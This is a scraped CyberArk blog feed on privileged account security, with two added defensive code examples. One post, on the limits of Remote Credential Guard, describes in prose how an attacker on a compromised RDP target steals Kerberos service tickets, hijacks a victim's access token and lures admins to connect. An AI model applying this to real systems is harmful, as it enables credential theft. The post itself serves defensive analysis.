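An added example (not from the original post) that puts the digest comparison to work on the backup-version question raised above: a manifest of SHA-2 or SHA-3 digests for each nightly backup, sealed with an HMAC under a key held away from the backup store, so that someone who can rewrite a backup cannot also rewrite its recorded digest. The file contents, version labels and key are constructed.

```python
# Added example: keyed integrity manifest over backup versions. A digest stored
# beside the data only detects alteration if the digest itself cannot be
# rewritten, so the manifest is sealed with an HMAC under a separately held key.
import hashlib
import hmac
import json

def digest(data: bytes, algorithm: str = "sha256") -> str:
    """Message digest of one backup image. hashlib exposes SHA-2 ("sha256",
    "sha512") and SHA-3 ("sha3_256", "sha3_512") behind the same interface."""
    return hashlib.new(algorithm, data).hexdigest()

def _canonical(body: dict) -> bytes:
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()

def build_manifest(versions: dict, key: bytes, algorithm: str = "sha256") -> dict:
    """versions: {label: bytes}, oldest first. The seal covers algorithm + entries."""
    body = {"algorithm": algorithm,
            "entries": [{"label": label, "digest": digest(blob, algorithm)}
                        for label, blob in versions.items()]}
    body["seal"] = hmac.new(key, _canonical(body), hashlib.sha256).hexdigest()
    return body

def manifest_is_sealed(manifest: dict, key: bytes) -> bool:
    """True only if the manifest was produced with this key and not edited since."""
    body = {k: v for k, v in manifest.items() if k != "seal"}
    want = hmac.new(key, _canonical(body), hashlib.sha256).hexdigest()
    return hmac.compare_digest(want, manifest.get("seal", ""))

def check_versions(versions: dict, manifest: dict, key: bytes) -> dict:
    """Reports which versions no longer match (missing counts as tampered) and the
    newest version that still verifies, i.e. the one to recover from."""
    if not manifest_is_sealed(manifest, key):
        return {"manifest_ok": False, "tampered": None, "latest_good": None}
    alg, tampered, latest_good = manifest["algorithm"], [], None
    for entry in manifest["entries"]:  # recorded oldest first
        blob = versions.get(entry["label"])
        if blob is None or not hmac.compare_digest(digest(blob, alg), entry["digest"]):
            tampered.append(entry["label"])
        else:
            latest_good = entry["label"]
    return {"manifest_ok": True, "tampered": tampered, "latest_good": latest_good}

def demo(algorithm: str = "sha256") -> dict:
    """Constructed nightly exports, then an alteration that keeps the file format."""
    key = b"constructed-manifest-key-kept-off-the-backup-host"
    versions = {
        "2016-10-30": b"account,balance\nACC-1001,2500.00\nACC-1002,980.50\n",
        "2016-10-31": b"account,balance\nACC-1001,2500.00\nACC-1002,1180.50\n",
        "2016-11-01": b"account,balance\nACC-1001,2500.00\nACC-1002,1180.50\nACC-1003,40.00\n",
    }
    manifest = build_manifest(versions, key, algorithm)
    altered = dict(versions)  # one balance changed; still well-formed CSV
    altered["2016-11-01"] = altered["2016-11-01"].replace(b"ACC-1003,40.00", b"ACC-1003,40000.00")
    forged = json.loads(json.dumps(manifest))  # adversary also edits the manifest...
    forged["entries"][-1]["digest"] = digest(altered["2016-11-01"], algorithm)  # ...but lacks the key
    return {
        "clean": check_versions(versions, manifest, key),
        "altered": check_versions(altered, manifest, key),
        "forged_manifest": check_versions(altered, forged, key),
    }
```

Passing `algorithm="sha3_256"` to `demo()` exercises the same checks with SHA-3, which is the drop-in role the post describes for it.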

Basic cyber security practices, including encryption, monitoring and access control, also can help to ensure the integrity of data in your systems.

Encrypting data at rest and in transit makes it less susceptible to alteration, provided the encryption is authenticated (or paired with a message authentication code): ciphertext modified without the key then fails verification or is readily apparent as garbage when decrypted, whereas unauthenticated ciphertext can often be altered without detection. Appropriate access control policy and enforcement help to keep adversaries away from the data, and network monitoring can identify suspicious activity as it happens and provide a trail if a breach is detected.

The bottom line is, good cyber hygiene should include the integrity of data as well as its confidentiality and availability. Is it time for your organization to have a cyber hygiene check up?

]]>
Cyber Security Nightmares https://www.cyberark.com/blog/cyber-security-nightmares/ Tue, 01 Nov 2016 19:34:46 +0000 https://www.cyberark.com/blog//

Cyber attackers pose a number of “scary” situations for IT security professionals. Attack vectors change, new threats emerge and staying on top of best practices can be a challenge.  In the CyberArk Global Advanced Threat Landscape Survey 2016, respondents were asked which cyber attacks or tactics were the most concerning for their organizations in the next 12 months. Considering the recent Dyn attack and other headlines, the results of that question were spot on: Distributed denial-of-service (DDoS) attacks (19 percent), phishing (14 percent), ransomware (13 percent), privileged account exploitation (12 percent) and perimeter breaches (12 percent).

The security industry understands the value of working together for the advantage of the greater good.  This is particularly important as we read about “amateurs” who have effective tactics thanks to a matrix of connected devices. Security professionals have to stay ahead of the curve, and the bar is continually moving higher. This requires prioritizing time and security initiatives.

CISOs and others certainly value sharing their experience and learning lessons from others. In the spirit of Halloween, here are three dark tales about companies that recently experienced horrifying cyber attacks—all through the exploitation of privileged accounts.

The Bone-Chilling Bangladesh Bank Heist

In February 2015, after breaking through the bank’s IT perimeter by using malware, cyber criminals captured administrator privileged credentials from infected machines. Using these stolen credentials, they moved laterally throughout the environment until they reached SWIFT, a financial services co-op that provides a secure network through which banks can send and receive monetary transactions. After commandeering SWIFTNet systems, the attackers proceeded to order a total of 35 transactions worth $951 million. Approximately $81 million was transferred before a spelling error raised suspicion that led to the discovery of the breach. To this day, the money remains unrecovered.

The Sinister Ukraine Power Shutdown

On December 23, 2015, 225,000 residents throughout western Ukraine lost electricity and the IT and OT systems belonging to two of the region’s utility providers were destroyed. This unprecedented cyber attack began when attackers sent spear phishing emails to IT systems administrators at the impacted utility companies; three individuals fell victim. With the click of a button, the attackers gained the inside access needed to exploit legitimate users, gain access to privileged accounts, and ultimately destroy systems and shut off electricity throughout the region—leaving thousands in the dark.

The Horrible OPM Breach

In 2014, alleged nation state attackers compromised a third-party contractor hired to conduct background checks on behalf of the U.S. federal government. The purpose of this “secondary” attack was to gain trusted access into the Office of Personnel Management (OPM) network. The attackers succeeded in their mission, breached the OPM network, escalated privileges and ultimately located and exfiltrated their desired data. Nearly a year after the attack on the contractor, OPM discovered that it had fallen victim to a large-scale, targeted data breach that resulted in the theft of highly personal information on 21.5 million current and former employees and contractors. Talk about a nightmare.

Privileged account security—or the lack of it—is a major factor in nearly every headline-grabbing cyber attack today. Businesses that fail to prioritize the security of their privileged accounts are at risk of becoming victims—which can mean significant damage to business, reputation and even the ability to operate. Download our free guide highlighting five top reasons to prioritize privileged account security… before it’s too late.


]]>
Infographic: Insider Threats Exceed Malicious Intentions https://www.cyberark.com/blog/infographic-insider-threats-exceed-malicious-intentions/ Wed, 26 Oct 2016 14:03:43 +0000 https://www.cyberark.com/blog//

The SANS Institute recently found that nearly a third of all organizations still have no capability to prevent or deter an insider incident or attack. Further, only nine percent of surveyed companies ranked their insider threat prevention methods as very effective. Yet as recent headlines show, the insider threat is very real and cannot be ignored.

To protect against insider threats, organizations must first understand—and identify—what the threat is. Our newly released eBook uncovers common misconceptions about insider threats, illustrates how these threats have manifested in real-world situations and provides new insight to help organizations reduce risk across four main categories:

  • Exploited Insiders: These are high-value employees specifically targeted by external attackers, usually via phishing. Attackers target employees to gain a foothold inside an organization.
  • External Insiders: Did you know that by 2017, 41 percent of workers will be temps, contractors or consultants? Just like employees, these external “insiders” are also a target exploited by cyber attackers.
  • Malicious Insiders: While accounting for only 26 percent of insider attacks, malicious insiders, such as disgruntled or angry employees, are the source of some of the most costly and difficult attacks to detect.
  • Unintentional Insiders: Most employees are just trying to do their jobs well—yet poor security habits too often put systems at risk.

This infographic details recent industry findings and statistics on insider threats, and highlights how insiders across all four categories can use privileged access to cause intentional or unintentional damage.

For additional information on the topic, read our eBook for details about insider threats and gain guidance on how your organization can contain and detect these attacks.


]]>
Judgment Day Cometh with the Rise of the Machines, or What I Learned at PuppetConf 2016 https://www.cyberark.com/blog/judgment-day-cometh-with-the-rise-of-the-machines-or-what-i-learned-at-puppetconf-2016/ Mon, 24 Oct 2016 11:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/judgment-day-cometh-with-the-rise-of-the-machines-or-what-i-learned-at-puppetconf-2016/  

“In the future, all software will be installed, configured, and managed by software.”

So said Luke Kanies, Puppet’s founder, during his keynote at his company’s annual conference in San Diego last week.  Puppet is a leading configuration management and server automation software company, and they’re an awesome partner of ours here at Conjur.

That vision that Luke laid out is one that we share.  But it also conjurs up (groan!) dystopian paranoia embodied by the future envisioned in the Terminator movies where software (in the form of Skynet) is taking over the world and eliminating humanity in the process.  Last week’s massive DDoS attack on Dyn that featured hacked web cams, baby monitors, and home routers feels like it might be the first step down a slippery slope.  How do we ensure we don’t go there?

The trend towards code managing code is nothing new, but the transformation of the way we are building and deploying applications these days is causing that trend to accelerate.  One of the most impactful slides from Luke’s keynote was this one:


The key point he was making was that as we move from physical servers to virtualized machines to containers, there is an exponential increase in complexity driven by the growth in the number of “entities” that need to be managed and the dramatic decrease in the life span of these entities.  With bare metal servers, there is a single entity to be managed and it typically lasts for three years.  Assuming you have 100 servers to manage, there are 100 “things” or “entities” to be managed over a 3-year period.  With VMs, assume there are 10 VMs per machine, and each one lasts 1 year.  Do the math, and you’ll find that means there are 3,000 entities to be managed over a 3-year period.  As we move to the container era, the life span of those entities can be on average a single second according to a recent survey released by New Relic.  And when you layer in the much greater density of containers (10 per VM, and 10 VMs per machine), the resulting number of entities that need to be managed over a 3-year period explodes to almost 16 billion.  It seems obvious that the ways in which we’ve managed servers — both the processes and tools — will need to be radically overhauled given the massive increase in complexity brought on by the container era.

Only software-based automation can keep pace with a management challenge of this magnitude, and that’s why companies like Puppet are seeing such dramatic growth in their adoption.  But as we increasingly delegate the management of code to code, questions of trust must be answered.  While we’re still far from the dark future envisioned in Rise of the Machines, how can we be sure that our approaches to security keep pace with the massive expansion in management complexity we are facing?

Part of the answer will come from automated management of the secrets that code relies on to stay secure while accomplishing its mission.  Security policies defined by people in products like Conjur can be used to automatically and continuously manage secrets across huge numbers of entities, all the while providing the necessary logging, alerting, and reporting needed to provide transparency to managers.

Beth Cornils, Puppet’s Senior Product Manager, and Verne Lindner, Senior UX Designer, delivered a great Puppet security roadmap session at the conference, during which they described how Conjur and Puppet can be used in conjunction to fuse high levels of automated security management with automated management of large-scale infrastructure.


If you’re interested in learning more about integrating automated secrets management with devops efforts, check out our white paper on the topic (registration required) or read up on Conjur’s integration with Puppet.  Or ping us for a demo if you’re interested in moving beyond hiera-eyaml and seeing how Puppet and Conjur work together in the real world to deliver a stronger security solution for our joint customers.  We were blown away by the positive energy at PuppetConf and the enthusiasm of many larger, more mature Puppet customers for what Conjur has to offer.  Let’s keep the machines in their place by working together.



]]>
Infographic: Why Privileged Account Security Must be a Top Priority https://www.cyberark.com/blog/infographic-privileged-account-security-must-top-priority/ Fri, 21 Oct 2016 20:25:29 +0000 https://www.cyberark.com/blog//

Make no mistake, your organization is a target – do you have an effective security program in place to detect and contain the damage of an attack? With nearly daily headlines about cyber attacks, it’s imperative that organizations understand the role privileged accounts play in the attack life cycle.  If privileged credentials are not properly managed and protected, business leaders should be prepared to deal with the aftermath of a crippling breach.

Consider the role of privilege in the following scenarios:

  • Insider Threats: According to industry reports, it takes about 146-170 days to detect an in-progress attack. That’s plenty of time for a malicious insider with access to authorized, privileged accounts (or an external attacker that appears as a legitimate insider) to do real damage.
  • Ransomware Attacks: For many reasons, phishing is a popular attack strategy, and often the phishing emails that target employees with direct (or indirect) access to privileged accounts contain sophisticated malware, such as ransomware.
  • Cloud Adoption: The fast-paced migration to the cloud and surge in automation tools comes with an increasing number of privileged accounts within IT infrastructures. This expands the potential attack surface exponentially.

These are just a few reasons why the first and most critical step in executing an effective, layered defense is to prevent the theft and exploitation of privileged credentials—across endpoints, servers and domain controllers, on-premises or in the cloud. Without these credentials, an attacker’s ability to move across the network is blocked. And if you block privilege escalation, you block the attack.

Check out our infographic for more information on the role of privileged accounts in the attack lifecycle, and learn why now is the time to give privileged account security the priority it deserves.


]]>
“No more Pass-the-Hash” – Exploring the limitations of Remote Credential Guard https://www.cyberark.com/blog/no-pass-hash-exploring-limitations-remote-credential-guard/ Tue, 18 Oct 2016 19:05:39 +0000 https://www.cyberark.com/blog//

Remote Credential Guard was recently introduced by Microsoft to mitigate the risk of credential theft from machines that are accessed through RDP. In essence, this feature enables RDP connections without leaving credentials on target servers. Instead, the credentials remain on the source machine and the target requests Service Tickets from the source as needed.

While a useful control, an attacker can still reside on a target machine, wait for an incoming connection and, instead of hijacking the credentials, simply request the tickets he wants from the source. Thus, even without having the credentials, as long as the session is open, the adversary can impersonate the privileged user (e.g., by stealing the generated service tickets or hijacking the victim’s access token).

This blog will explore some of the ways this attack vector can be executed.

The Remote Credential Guard

Last year, Microsoft introduced the Credential Guard – a security feature in Windows 10 Enterprise and Windows Server 2016. Credential Guard uses virtualization technology to mitigate the risk of derived domain credentials theft after compromise, thus reducing the effectiveness of Kerberos attacks such as Overpass-the-Hash and Pass-the-Ticket. Recently, Microsoft released the Anniversary update and, with it, the Remote Credential Guard, a security feature that aims to protect credentials over Remote Desktop (RDP) connections by generating the necessary service tickets from the source machine instead of by copying the credentials (hashes and TGTs) to the target machine.

Source: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/remote-credential-guard

This feature is designed to allow administrators to safely connect to untrusted remote servers (“assume breach”) without leaving privileged credentials on those servers. It seems to be replacing the Restricted Admin mode, a feature introduced in Windows 8.1 / 2012 R2 and then “back-ported” to Windows 7 / 8 / 2008 R2 / 2012. Restricted Admin mode aimed to secure privileged credentials by “switching” the RDP session to a local admin session, thus preventing the theft of privileged domain credentials. The key advantage of the Remote Credential Guard in comparison to the Restricted Admin mode is that the RDP connection is fully interactive (instead of a network logon), allowing access to remote services from the credentials-free RDP session.

When a user logs in via RDP to a machine that has Remote Credential Guard enabled, none of the Security Support Providers (SSP) in memory store the user’s clear-text password or password hash. Thus, if an attacker has compromised the target machine and tries to dump the hashes, there will be no hashes there to dump.


This eliminates an attacker’s ability to execute Pass-the-Hash or Overpass-the-Hash (aka Pass-the-Key) attacks to impersonate the remote user. So, is this the end of credential theft attacks?

Service Tickets are still there

Note that Kerberos tickets still remain in memory to allow interactive (and SSO) experiences from the target (RDPed) server.  Dumping the cached Kerberos tickets from memory shows that the session key of the Ticket Granting Ticket (TGT), which has been delegated from the client machine’s Credential Guard, is encrypted, making it unusable for a Pass-the-Ticket attack.


However, because service tickets (Ticket Granting Service) are not encrypted, it is still possible to pass them to gain access to specific services (SPNs). The scope of access and the escalation opportunities here depend on the service tickets that can be extracted.

The target server will retrieve any service ticket the user requests through the source (RDPing) machine. If the RDP session involves execution of administrative tasks or access to sensitive assets, it will probably cache juicy service tickets that could be abused for remote execution and data exfiltration. So, while it is true that password hashes and TGTs have broader exposure, and thus are more sensitive than service tickets, those service tickets can be quite valuable in their own right.

Nevertheless, service tickets are limited. What if the attacker is not satisfied with what he got and wants access to other, more lucrative targets? After all, while the victim’s account may have adequate permissions for escalation, relying on the user to request the service tickets that enable effective elevation may not work.

Borrow the Access Token

Well, despite the fact that the victim’s credentials are isolated by Credential Guard on the source machine, the victim account’s access token still exists on the compromised server as long as the RDP session is live. Hijacking this access token allows an attacker on a compromised server to run code in the context of the victim’s account. Even though the victim’s TGT is protected, the Remote Credential Guard will redirect any Kerberos requests back to the source machine, and the source machine will be tricked into granting service tickets.

Service tickets will be generated and permissions will be granted for both the RDP client’s token and the malicious duplicated token based on the authenticated account privileges. Even if the attack window is narrow, it is possible to quickly request arbitrary tickets on behalf of the victim and use them later on another machine. By default, the lifetime of service tickets is 10 hours, leaving enough time for the attacker to plan the next move.

Timing or skills

The mentioned attack vector requires two prerequisites: a machine with administrative access and a user who is logged on (or was logged on recently) to that compromised server. The former could be achieved by exploiting a vulnerability or abusing a misconfiguration, while the latter will demand social engineering or a bit of luck. The first thing to do after compromising a server is to check whether an active terminal session or cached Kerberos tickets exist. If there are no credentials and time is not an issue, it’s possible to reside on the machine and wait for incoming connections. Or perhaps use the old-fashioned trick and encourage such a connection by luring an admin to RDP to the machine by creating an issue that requires higher privileges to resolve.

Summing it all up

The Remote Credential Guard is designed to protect privileged domain credentials from being exposed when connecting to a remote server with RDP, yet derived credentials are not limited to NTLM hashes and Kerberos TGTs. From the attacker’s perspective, the quantity of compromised credential derivatives is irrelevant if one of them grants a sufficient level of access. While limiting the potential exposure of credentials to some extent, the Remote Credential Guard does not fully mitigate the risk of credential theft by a determined adversary that has already compromised the target machine and is simply waiting for a privileged session to take the bait.

Recommendations

Given the limitations of Remote Credential Guard, what else can be done to protect derived credentials from theft? Here are a few steps you can take and policies you can enforce to close some of the gaps that are left open by Remote Credential Guard:

  • Establish remote connections using network logon instead of interactive logon when possible
  • Set up and restrict administrative access by tiers (Tier Model), i.e., Forest/Domain Admin accounts are used only to administer the Active Directory
  • Reduce credentials exposure to the least privilege required for the specific task
  • Enforce credential removal after logoff


]]>
The Other Insider Threat https://www.cyberark.com/blog/the-other-insider-threat/ Thu, 13 Oct 2016 18:50:00 +0000 https://www.cyberark.com/blog//

The trusted insider has always been a security risk – whether an executive with access to sensitive information or an administrator on an enterprise network. According to a recent report from the Ponemon Institute, 56 percent of security practitioners surveyed said that company insiders are the primary cause of security breaches and 72 percent were not confident they could control employee access to sensitive information.

We have written recently in our blog about the threat of malicious insiders. But it is not only the malicious you need to worry about – don’t underestimate the threats posed by human error and good intentions.

To err is human

According to IBM, human error was found to be a contributing factor in more than 95 percent of incidents investigated. The most common problems included system misconfiguration, poor patch management, using default settings and weak passwords, lost devices and sending sensitive data to the wrong e-mail address. This data is now two years old, but these examples of errors are still typical today.

Some of these problems are the result of the individual’s poor decision or a slip of the mouse. It could be something as simple as clicking “reply all” on an e-mail. Some, however, are the result of poor policy or poor management. System configurations and patch management should be matters of organizational policy and should be periodically assessed.

We will never rid ourselves completely of mistakes, but there is vast room for improvement.

The path to poor security is paved with good intentions

Most employees are hard-working and want to do a good job. In fact, many go out of their way to do their jobs efficiently, and that can pose a problem. It is not uncommon for employees to install unauthorized wireless access points to make it easier to connect to the network throughout the office. These points can improve productivity and worker satisfaction, but unknown and unmanaged by administrators, they also create security holes that can be used by attackers to gain access.

Studies consistently show that workers also regularly connect remotely to work networks using personal devices – mobile phones, tablets, laptops and home PCs. Too often this is done from unmanaged devices in violation of organizational policy. The workers mean well, but the result can be gaping holes in network defenses.

Workers often see security as a roadblock rather than an enabler. When this happens, they will find ways around policy in order to do their jobs more easily and become insider threats.

The unwitting accomplice

Honest insiders also are targeted by malicious outsiders through social engineering. E-mail phishing (and spear-phishing to target high-value individuals) is one of the most common types of social engineering, but examples range from simple phone calls to carefully crafted Web sites hosting malicious content.

Insider threats do not stop with your employees. Contractors, business partners and links – both upstream and down – in your supply chain all present threats that can be used to compromise your network from the inside.

Protecting yourself

The first line of defense against the well-intentioned insider is awareness and training. All employees should be educated to understand the risks, organizational policies and the reasons for those policies. However, the basic rule in defending against both well-intentioned and malicious insiders is to address the threat, not the individual.

You can find more detailed information on detecting and reducing insider risks in the CyberArk ebook, “The Danger Within: Unmasking Insider Threats.” Addressing the insider threat requires a combination of proactive protection and threat detection including:

  • Using least privilege access to limit potential accidental or intentional damage
  • Controlling applications to reduce the risk of users becoming exploited
  • Telling users that their actions will be monitored to deter unauthorized behavior
  • Monitoring user and account activity to detect threats on the inside – be it from malicious or exploited insiders

Learn more about how the CyberArk Privileged Account Security Solution helps organizations to limit user privileges and control access to reduce the risk from insiders on our website.

]]>
Déjà vu: Malicious Insider Puts NSA Back in the Spotlight https://www.cyberark.com/blog/deja-vu-malicious-insider-puts-nsa-back-spotlight/ Fri, 07 Oct 2016 18:33:14 +0000 https://www.cyberark.com/blog//

Just three short years after NSA contractor Edward Snowden brought insider threats to the forefront, the agency has once again made headlines. News broke this week that a former NSA contractor—employed by the consulting firm Booz Allen—was recently arrested and is being investigated by the FBI for potentially stealing top-secret computer code used to hack into foreign government networks. The New York Times has full details.

Despite significant increases in cyber security awareness, as well as new rules detailed in the National Industrial Security Program Operating Manual (NISPOM) that charge contractors to establish programs to identify personality indicators of malicious insider threats, government agencies and private sector organizations alike haven’t learned their lessons and are failing to employ security basics designed to unmask insider threats.

Though malicious insiders account for fewer incidents than unintentional insiders, malicious inside attacks are the most difficult to detect and carry the highest costs when compared to other non-malicious breach types. It makes sense—your trusted employees don’t fit the “typical profile” of an attacker, so they can often operate stealthily under the radar for long periods of time.

Third-party contractors add another layer of complexity: Because they are not fully controlled and managed by your organization, it can be especially difficult to secure all of these users and their endpoints. For example, external users can easily share privileged account credentials used to access sensitive information, or technology vendors can embed privileged accounts in the systems they manufacture—all without your knowledge or permission.

Why Insiders “Go Rogue”

When it comes to malicious insiders, there are a few common motivations that are seen across a wide variety of attackers. Many malicious insiders are simply frustrated or angry; they often feel as if their employer or manager has done something wrong. Others are motivated by financial reasons. Others are similar to hacktivists, in that they are motivated by political and personal beliefs. Still others may be influenced by an outside party, such as a crime ring or nation-state that is using blackmail to coerce behavior.

To effectively protect against both malicious and non-malicious insider threats, organizations must first understand what the insider threat truly is. Our new eBook, The Danger Within: Unmasking Insider Threats, outlines the who, what, why and how of the insider threat to expose risks you may not be considering, and provides guidance to help prevent and detect these potentially damaging and costly attacks.

Download it here: https://www.cyberark.com/resource/danger-within-unmasking-insider-threats/

]]>
Five Operational Benefits of Securing Privileged Linux Accounts https://www.cyberark.com/blog/five-operational-benefits-securing-privileged-linux-accounts/ Thu, 06 Oct 2016 19:11:55 +0000 https://www.cyberark.com/blog//

When talking with Unix and Linux teams about securing privileged and root access, the first question sysadmins typically ask is, “Is this going to make my job more difficult?”

In keeping business critical applications running, Unix and Linux teams are essentially tasked with keeping the business running. Anything that interferes with this effort or complicates workflows can simply be considered unacceptable. Given the common perception that increased security means painful operational tradeoffs, it’s no surprise that sysadmins are skeptical of new tools. However, not all security tools are created equal.

Despite popular belief, security does not always have to come with painful tradeoffs. Many privileged account security solution end users, particularly in Unix and Linux environments, have been able to use the automation provided by the solutions to simplify IT operations processes. With the operational gains they’ve experienced, some have been able to free up time – ranging from hours to weeks – enabling them to focus their efforts on more important or interesting projects.

If your organization is considering privileged account security but you’re concerned about how this type of solution may impact your day-to-day job, read the five benefits below that have been shared with us by Unix and Linux admins who are also CyberArk users.

Five day-to-day operational benefits that CyberArk customers have experienced:

  1. Less effort to track credentials. When users manually keep track of their credentials, they can easily be lost or forgotten. One end user actually reported that he kept all his passwords in his wallet, because it was the only way he felt they would be safe. With the Privileged Account Security Solution, users no longer need to keep track of their own credentials. Instead, users need only keep track of one credential – their CyberArk credential – and everything else is managed for them.
  2. Less time spent managing credentials. Automated password management capabilities can help to eliminate manual, time consuming processes. One CyberArk user reported that the CyberArk Privileged Account Security Solution enabled him to take on more work because it reduced the time he spent managing passwords by 20-25 percent.
  3. Less time creating and deleting accounts. When admins join or leave the Unix/Linux team, there is no simple way to create or remove local user accounts on each individual system. A customer reported that in his environment of 4,000 Unix servers, it took a full month to provision access each time a new employee joined the team. Once the CyberArk Privileged Account Security Solution was in place, the account provisioning and de-provisioning process was automated, reducing this one month of effort to just a few minutes.
  4. Less time spent managing least privilege controls. Admins tasked with managing sudo policies often find this tool frustrating. Instead of applying policies across all systems, they have to be applied one-by-one to each individual Linux and Unix system. The CyberArk Privileged Account Security Solution helps Unix/Linux admins to centrally manage and update least privilege policies for users across all managed systems. This eliminates the highly repetitive effort of updating policies on each system, saving time and effort and enabling admins to focus on more interesting work.
  5. Less risk of broken processes related to password changes. One customer had a web application that needed to access a database during certain ecommerce transactions. The database password was embedded into the application code for reliability, but to meet PCI DSS requirements, the password needed to be changed every 90 days. One error could result in immediate lost revenue for the company. With the CyberArk Privileged Account Security Solution, the customer was able to centrally manage the database password and ensure that the password change was seamlessly propagated to all dependent applications and services without taking on the risk of broken processes – and without risking revenue with every password change.
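Benefit 5 above describes an application that embeds a database password and breaks when that password is rotated. The following added example (not CyberArk's or the customer's code) shows the general pattern that avoids the broken process: the application fetches the credential from a central store at run time and re-fetches once after an authentication failure, so a rotation published to the store is picked up without an outage. The store, the database and the rotation routine are simulated in memory; all names and values are constructed.

```python
"""Rotation-aware database credential retrieval (simulated end to end)."""
import secrets
import threading


class CredentialStore:
    """Stand-in for a central credential manager (constructed for this example)."""

    def __init__(self):
        self._lock = threading.Lock()
        self._creds = {}  # name -> (username, password, version)

    def set(self, name, username, password):
        with self._lock:
            version = self._creds.get(name, (None, None, 0))[2] + 1
            self._creds[name] = (username, password, version)

    def get(self, name):
        with self._lock:
            return self._creds[name]


class AuthError(Exception):
    pass


class FakeDatabase:
    """Minimal database that accepts only the password currently set on it."""

    def __init__(self, username, password):
        self.username, self.password = username, password
        self.connections = 0

    def connect(self, username, password):
        if (username, password) != (self.username, self.password):
            raise AuthError("invalid credentials")
        self.connections += 1
        return True


class RotatingDbClient:
    """Application side: caches the credential and refreshes it on AuthError.

    The cache avoids a store round-trip per transaction; a single retry after
    an AuthError covers the window between the store being updated and the
    application noticing. Two failures in a row are a real error and propagate.
    """

    def __init__(self, store, db, cred_name):
        self.store, self.db, self.cred_name = store, db, cred_name
        self._cached = None
        self.refreshes = 0

    def _credential(self, force=False):
        if self._cached is None or force:
            self._cached = self.store.get(self.cred_name)
            self.refreshes += 1
        return self._cached

    def transaction(self):
        user, pwd, _ = self._credential()
        try:
            return self.db.connect(user, pwd)
        except AuthError:
            user, pwd, _ = self._credential(force=True)  # password may have rotated
            return self.db.connect(user, pwd)             # raises if still wrong


def rotate(store, db, cred_name):
    """Rotation as a central manager would do it: generate a new password,
    change it on the target, then publish it so dependents pick it up."""
    user, _, _ = store.get(cred_name)
    new_pwd = secrets.token_urlsafe(24)
    db.password = new_pwd                 # change on the target first ...
    store.set(cred_name, user, new_pwd)   # ... then publish to the store
    return new_pwd


def simulate(rotations=3, tx_per_round=10):
    """Run tx_per_round transactions, rotate, repeat; return (successes, refreshes)."""
    store = CredentialStore()
    db = FakeDatabase("shop_app", "initial-password")   # constructed values
    store.set("ecommerce/db", "shop_app", "initial-password")
    client = RotatingDbClient(store, db, "ecommerce/db")
    ok = 0
    for _ in range(rotations):
        for _ in range(tx_per_round):
            ok += client.transaction()
        rotate(store, db, "ecommerce/db")
    return ok, client.refreshes
```

Each rotation costs exactly one failed connect followed by one store fetch; a password changed on the database but not published to the store still fails, which is the case the retry must not hide.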

Learn more about how CyberArk solutions help customers to balance security and operational priorities in Unix and Linux environments, while simplifying the day-to-day tasks for end users.

]]>
Effective Cyber Security Response: Test & Communicate Your Plan https://www.cyberark.com/blog/effective-cyber-security-response-test-communicate-plan/ Tue, 04 Oct 2016 19:50:06 +0000 https://www.cyberark.com/blog//

Organizations plan for success. They should also plan for worst case scenarios – especially in the case of a cyber attack or breach. For many organizations, preparedness means developing plans for disaster recovery and continuity of operations.

As the cyber threat landscape has evolved, incident response is no longer the sole responsibility of IT. Every organization is targeted by adversaries, and some compromise is inevitable. Data breaches or other incidents have an impact on more than just the information or technology infrastructure — they can impact a business’s ability to operate.

As noted in the recently released “CyberArk Global Advanced Threat Landscape Survey 2016,” many organizations have adopted a “post-breach” mindset, meaning they operate under the presumption of a breach and have developed post-breach response plans. The realities of today require this proactive mindset. In the survey of 750 IT and IT security decision makers, 95% of respondents reported their organization has a cyber security emergency response plan. That’s relatively good news. However, digging below the surface we also learned:

  • Less than half (45%) of respondents reported the plan has been communicated and is regularly tested with all IT staff.
  • Four in ten (40%) state that their organization’s plan has only been communicated and regularly tested with senior IT staff.

If an incident occurs, does the PR team have a media outreach strategy in place? How will you notify customers? How will HR handle employee communications if email and intranet services go down? Are inside sales and service teams trained to handle outbound customer communications?

There are many considerations to make. At a minimum, incident response planning should address the following:

Who is in charge?

A strong cyber security response plan requires clearly defined roles and responsibilities, including empowering a strong leader and decision-maker. Many organizations default this responsibility to the chief legal counsel, but crisis experts note that although lawyers should be available to advise, they are not the best choice to lead the response.

Effective incident response requires organizational and administrative abilities as well as technical knowledge – if not hands-on technical skills. The choice of this leader can vary depending on the organization and the personnel available, but it should be someone with an understanding not only of the IT systems but also how they support your organization’s mission and business operations. The CIO or CISO might be a good place to start in some organizations. Post-breach, clear lines of communication are required for prompt and decisive actions. Determine this in advance.

A documented response plan will cover how your organization will work with the primary response team for data recovery, continuity of operations and forensics. It will lay out responsibilities and roles and help to ensure effective decision making in crisis mode.

Test, Adapt and Test Again

A static “shelfware” plan will not address your incident response needs. This is particularly true as the threat landscape continues to evolve. It is critical to battle-test readiness through live drills to help prevent company paralysis when a data breach or other incident occurs. Drills can help to uncover deficiencies in planning and implementation, so that plans can be updated as needed.

Periodic testing and updating is necessary to keep your incident response plan effective. Having a documented and evaluated incident response plan demonstrates to customers and regulators that your organization is taking responsible steps to anticipate and mitigate the risk of threats.

Are you prepared? Attackers will get inside the network, and they will operate undetected for months by impersonating authorized users. An important part of planning also involves taking a proactive, layered approach to security (which we regularly advocate to our customers), while ensuring security best practices are part of your organization’s DNA.

For more information about the gaps in security awareness and preparedness, read the CyberArk Global Advanced Threat Landscape Survey 2016.

]]>
Scaling security: 4 million secrets per minute https://www.cyberark.com/blog/scaling-security-4-million-secrets-per-minute/ Fri, 30 Sep 2016 17:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-security-4-million-secrets-per-minute/  

What’s your cloud reboot preparedness? Whether it’s a disaster recovery scenario or applying a critical update, restarting your cloud infrastructure will need to happen fast, and it will require access to security credentials, possibly millions of them. You don’t want your security architecture to fail under the workload.

Conjur’s security software helps automate the identity, access management and secrets systems for cloud infrastructure, and we’ve put a lot of thought into scalability over the years. Scaling secrets management to work fast in the cloud restart scenario is hard because:

  • There are so many types of secrets (passwords, API keys, SSH keys, etc.), with different rules and permissions attached to them.
  • Permissions have to be checked to ensure secrets go out to the right places, and not the wrong ones.
  • An audit trail of all requests (successful or not) must be logged.
  • The requests for credentials often come from software that is distributed across multiple cloud data centers, platforms, or regions.

Here’s a customer use case that puts the challenges and solution in perspective for security architects.

The customer use case: “1.5 million secrets, please”

